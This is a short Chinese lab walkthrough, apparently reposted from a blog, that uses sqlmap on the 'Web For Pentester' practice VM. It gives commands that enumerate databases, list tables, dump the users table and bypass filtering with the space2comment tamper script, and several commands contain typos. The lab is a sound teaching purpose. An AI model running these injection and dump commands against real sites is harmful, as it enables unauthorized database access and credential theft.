sqlmap注入-Web For Pentester
一、要求
使用sqlmap注入,测试pentester的web页面漏洞
Pentester网站,服务器ip地址为192.168.202.128
a.查询当前数据库:
root@kali:~# sqlmap -u "http://192.168.202.128/sqli/example1.php?
name=root" –dbs
b.查询数据库对应的表
root@kali:~# sqlmap -u "http://192.168.202.128/sqli/example1.php?
name=root" -D exercises –tables
c.查询表内容
a.查看example2当前数据库
root@kali:~#sqlmap-u http://192.168.202.128/sqli/example2.php?
name=root –dbs出现报错,执行绕过脚本语句
root@kali:~#:sqlmap -u 192.168.202.128/sqli/example2.php?
name=root--dbs --tamper=space2comment.py -v
b.查看表信息
root@kali:~#sqlmap-u http://192.168.202.128/sqli/example2.php?
name=root -D exercises --tables
c.查看表下内容
root@kali:~#sqlmap-u http://192.168.202.128/sqli/example2.php?
name=root -D exercise -T users --dump
a.查看example3当前数据库
root@kali:~#sqlmap-u http://192.168.202.128/sqli/example3.php?
name=root –dbs出现报错,执行绕过脚本语句
root@kali:~#:sqlmap -u 192.168.202.128/sqli/example3.php?
name=root--dbs --tamper=space2comment.py -v
b.查看表信息
root@kali:~#sqlmap-u http://192.168.202.128/sqli/example3.php?
name=root -D exercises --tables
c.查看表下内容
root@kali:~#sqlmap-u http://192.168.202.128/sqli/example3.php?
name=root -D exercise -T users --dump
(由网址http://192.168.202.128/sqli/example4.php?id=2可以看出example4为数字型注入)
a.查看数据库
root@kali:~# sqlmap -u "http://192.168.202.128/sqli/example4.php?id=2" --dbs
b.查看表信息
root@kali:~# sqlmap -u "http://192.168.202.128/sqli/example4.php?id=2" -D exercises --tables
c.查看表下内容
root@kali:~# sqlmap -u "http://192.168.202.128/sqli/example4.php?id=2" -D exercises -T users --dump
(由网址http://192.168.202.128/sqli/example5.php?id=2可以看出example5为数字型注入)
a.查看当前数据库
root@kali:~# sqlmap -u "http://192.168.202.128/sqli/example5.php?id=2" --dbs
b.查看表信息
root@kali:~# sqlmap -u "http://192.168.202.128/sqli/example5.php?id=2" –D exercise --tables
c.查看表下相关信息
root@kali:~# sqlmap -u "http://192.168.202.128/sqli/example5.php?id=2" –D exercise -T users --dump
原文:https://www.cnblogs.com/loopkep/p/11219988.html